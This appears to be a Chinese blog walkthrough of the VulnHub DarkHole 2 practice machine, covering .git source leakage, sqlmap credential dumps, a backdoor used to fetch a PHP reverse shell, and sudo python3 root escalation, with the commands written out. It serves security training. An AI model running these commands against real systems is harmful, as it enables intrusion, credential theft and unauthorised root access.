Vulnhub_Darkhole_2

最新推荐文章于 2023-06-14 15:45:44 发布
最新推荐文章于 2023-06-14 15:45:44 发布
阅读量467 收藏
点赞数
文章标签: git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/128179978
版权

092baa68814fbe64f2828f6a0fa1e6ac.gif

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关。

主机信息

kali:192.168.31.136
Darkhole_2:192.168.31.72

信息收集

使用netdicover发现目标主机IP为192.168.31.72

80a04196c2dac490c3956a6862e61cce.png

然后使用nmap对目标机器进行探测发现开放了22、80两个端口,并且80端口的网站有个git目录

nmap -A -p- 192.168.31.72

9894fdd1cebe1860b6c1a8d33c247b86.png

使用GitHack将数据dump下来

python2.7 GitHack.py http://192.168.31.72/.git/

f9806c4843c13ce6b8dd5e59a74ba438.png

查看配置文件找到了数据库配置文件

c9fbc08d43f41d5024bcdc6b42c405de.png

查看一下历史版本

git log

e3dbc7d4cdb0b065ea4492e58bb968ea.png

生成最新版的到backup目录

git clone . backup

ec972c1841e94d7bad00f1ea39d81908.png

通过切换分支得到一个有漏洞的版本

git checkout a4d900a8d85e8938d3601f3cef113ee293028e10

926b09278eba6b1ffcbe271079a0dfd2.png

查看源码得到一个用户名和密码

adf7a52c59cd59deb37263d69f7cd0db.png

使用这个密码成功登陆到后台

e3ed39a2d2704c81fbb59805309fc552.png

通过sqlmap跑了一下URL中的id存在SQL注入漏洞

sqlmap -r login_burp_get --dbs

06f2dccc61b8c763f2be7d2c3245b877.png

获取表名

sqlmap -r login_burp_get -D darkhole_2 --tables

07ed81c000795f367e3dc36bfdb30940.png

dump ssh表数据

sqlmap -r login_burp_get -D darkhole_2 -T ssh --dump

1841f32f8aecd8ba8b26f532394a7bc9.png

Dump users表数据

sqlmap -r login_burp_get -D darkhole_2 -T users --dump

3209a875a95aa20a459b4e87e91991f0.png

GETSHELL

使用获取到的密码登陆到服务器

f67130fa35d237f59988bc6ab7cad5a0.png

查看服务器文件,在losy用户的家目录下找到一个flag

bef1923ab65657ce904fce82756e7d13.png

在下载检测脚本的时候发现jehad的家目录下自动生成了一个les.sh的脚本,但是没有内容,初步判断应该存在定时任务

950c46f824c7aed27240bde11bf906ad.png

提权

通过脚本找到疑似存在下面的漏洞,单无法提权成功

d45cbdeb8f956002a6aa0a640903fa9d.png

查看进程信息发现有一个以losy身份监听9999端口的进程

7fbf7160b5f532174e8e3db899503ed1.png

查看代码发现是一个后门程序

c5467b310777acdbe7c4730ef0703598.png

通过尝试发现可以成功执行命令

c55a1bc505632ba81147f2e7debe9abf.png

执行下载木马

27dd1d497874eccbfe10bdde9b063e96.png

访问上传的木马得到shell

curl localhost:9999/php-reverse-shell.php

ef0d7bfaab6475abe3368b8359b29ea1.png

获取tty shell

python3 -c 'import pty;pty.spawn("/bin/bash")';
 export SHELL=bash
 export TERM=xterm-256color

8f642b085e287c8a07254de18a0cca49.png

查看历史命令发现用户名密码

fe2840c8f5d0ac8dd778f7e125de20dc.png

查看发现python可以以root权限执行

346dca1bf1614ae6d4091516c492323d.png

使用python提权到root

sudo python3 -c 'import os; os.system("/bin/sh")'

bb0592597e2244dd65c52d5964c1f166.png

获取root权限的Flag

af33b24d899d407af7b225c49c73dd5b.png

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

d7d4cffcb4a4019edec46d7d9645ee54.jpeg

NowSec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub-DARKHOLE: 2
Re1_zf的博客
02-06 246
1、git源码泄露可以用git相关命令,比如git log和git show,都可以快速定位敏感信息2、sqlmap进行测试时,有时网站需要指定cookie3、ssh -L可以进行端口转发,语法类参考ssh -L 9999:127.0.0.1:9999 jehad@192.168.64.1374、脚本反弹shell5、.bash_history很有可能隐藏着敏感信息6、简单的sudo提权。
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 1017
VulnHub-DarkHole: 2靶机详细渗透过程
看完这篇 教你玩转渗透测试靶机vulnhubDarkHole2
Aluxian_的博客
05-31 904
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度适中。
Vulnhub--DarkHole:2
weixin_45168704的博客
06-14 211
DarkHole2
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 1000
vulnhub靶场 DarkHole: 2,难度:困难级别
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
Centos7搭建2节点DMDSC(DMASM)
weixin_45181397的博客
08-09 703
搭建DSC 目录:搭建DSC前言:1.环境准备1.1硬件设施1.2共享磁盘的创建1.2.1共享磁盘的划分(一台机器上操作即可)2.配置DMASM2.1配置dmdcr_cfg.ini2.2使用 DMASMCMD 工具初始化(节点一):2.3配置dmasvrmal.ini文件2.4配置dmdcr.ini文件2.5节点一配置dminit.ini文件2.5.1使用dminit初始化DB环境:3.启动操作3.1节点一和节点二依次启动css3.2节点一和节点二依次启动asm3.3创建 DMASM 磁盘组3.4启动数据库
mysql 修改表属主_mysql主主复制配置
weixin_36011546的博客
02-27 694
一、主从服务器设置。主服务器Ip:192.168.31.136从服务器ip:192.168.31.132二、主从服务器都需要设置的主从服务器下载安装mariadb-5.5.36:1、解压tar xf mariadb-5.5.36-linux-x86_64.tar.gz -C /usr/local2、创建软链接cd /usr/localln -sv mariadb-5.5.36-linux-x86_...
vulnhubdarkhole_2
weixin_54431413的博客
07-04 484
首先进行了下载了.git,对其中各个版本源码来审计,拿到后台登录权限,之后利用sql注入拿到jhead的密码。通过对.bash_history的查看,发现了本地执行用户为lucy的9999的命令执行漏洞,水平提权到lucy,通过对lama的暴力破解拿到root,通过lucy的sudo提权...
Vulnhub靶场】DARKHOLE: 2
DG_s1mple
03-23 1574
环境准备 下载靶机导入到vmware 攻击机IP为:192.168.2.18 靶机的IP为:192.168.2.16 信息收集 我们首先使用nmap扫描一下靶机开放的端口信息 发现只开放了ssh跟http服务,我们首先访问一下他的网站 有一个登录界面,其他并无什么有用信息 渗透开始 网站页面没有什么有用信息,我们扫描一下网站的目录 有.git泄露,我们使用工具把它下载下来 看看git的日志 发现有修改过login.php文件,我们回到这次缓存 获得网站后台的账号密码,我们去登录一下 发现这里
VulnhubDARKHOLE: 2渗透测试
Bird&Bird
01-11 3818
目录1、靶机概述2、信息搜集分析git源码SQL注入获取losy用户shell提权到root 1、靶机概述 Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Force kali:192.168.110.128 靶机:192.168.110.137 2、信息搜集 首先探测靶机IP地址 扫一下端口和服务,可知靶机只开启了2
Vulnhub靶机:DARKHOLE_ 2
LainWith的博客
09-14 1276
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
DarkHole: 2 vulnhub walkthrough
xdeclearn的博客
09-08 530
主机和端口发现: ➜ ~ nmap -sn 192.168.143.0/24 Host is up (0.00010s latency). Nmap scan report for 192.168.143.206 ➜ ~ nmap -T4 -v -p- 192.168.143.206 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 访问web服务,有一个登录页面: 尝试注入失败,于是dirb爆破一下目录: 发现了git目录,于是使用
DARKHOLE: 2
weixin_45042115的博客
10-05 1882
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描,瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面 这个应该就此此次的目标了,对它单独的扫描一次,收集更多信息 发现开放22端口和80端口,即对应的远程连接
ms12_004漏洞进行渗透
dichengpai8268的博客
05-03 326
环境: 攻击机:kail linux (IP:192.168.31.54) 目标机:winds 7 (IP:192.168.31.136) 1、启动metaspolit 2、输入命令search ms12_004,找ms12_004漏洞的利用模块 3、使用这个模块 4、查看设置的参数 5、设置一些SRVHOST、payload、LHOST、URIPA...
vulnhub靶机——raven: 2
09-03
你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* [vulnhub靶机raven2]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值